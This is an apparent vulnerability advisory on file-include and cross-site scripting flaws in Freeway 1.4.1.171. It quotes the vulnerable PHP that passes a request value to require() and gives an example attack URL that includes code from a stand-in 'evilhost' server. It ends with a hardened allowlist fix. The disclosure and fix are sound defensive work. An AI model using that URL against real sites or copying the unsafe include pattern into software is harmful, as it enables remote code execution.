source: https://www.securityfocus.com/bid/30676/info

Freeway is prone to multiple remote file-include and cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

Freeway 1.4.1.171 is affected; other versions may also be vulnerable.

1. Multiple Remote/Local File Include

Example:

...
$command=isset($HTTP_GET_VARS['command'])?$HTTP_GET_VARS['command']:'';
...
if($command!="")
{
switch($command){
...
case 'include_page':
require($HTTP_GET_VARS['include_page']);
break;
...

http://www.example.com/[installdir]/admin/create_order_new.php=http://evilhost/info.php

Local File Include vulnerability found in script includes/events_application_top.php

2. Linked XSS vulnerability

Example:

http://www.example.com/[installdir]/admin/search_links.php
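
A hardened form of the 'include_page' case shown above, as an added example that is not Freeway's code or part of the original advisory: the request value selects an entry from a fixed allowlist instead of being passed to require(). PAGE_DIR and the page names in ALLOWED_PAGES are hypothetical.

```php
<?php
// Added example: hardened replacement for the 'include_page' case.
// PAGE_DIR and the allowlist entries are hypothetical, not Freeway's real files.

const PAGE_DIR = __DIR__ . '/pages';

// Request keys map to fixed file names; user input never becomes a path.
const ALLOWED_PAGES = [
    'order_summary' => 'order_summary.php',
    'customer_info' => 'customer_info.php',
];

/**
 * Resolve a user-supplied page key to an absolute path inside PAGE_DIR,
 * or return null when the key is unknown or the file is out of bounds.
 */
function resolve_include_page($key): ?string
{
    // Reject arrays (?include_page[]=x) and anything not on the allowlist.
    if (!is_string($key) || !array_key_exists($key, ALLOWED_PAGES)) {
        return null;
    }
    $base = realpath(PAGE_DIR);
    $path = realpath(PAGE_DIR . '/' . ALLOWED_PAGES[$key]);
    // realpath() returns false for missing files and resolves symlinks and "..",
    // so the prefix check confirms the target really lives under PAGE_DIR.
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

$command = isset($_GET['command']) ? $_GET['command'] : '';

if ($command === 'include_page') {
    $path = resolve_include_page($_GET['include_page'] ?? null);
    if ($path === null) {
        http_response_code(400);
        exit('Unknown page');
    }
    require $path;
}
```

Setting allow_url_include = Off in php.ini blocks the remote-URL variant but not local file inclusion, so the allowlist is still required.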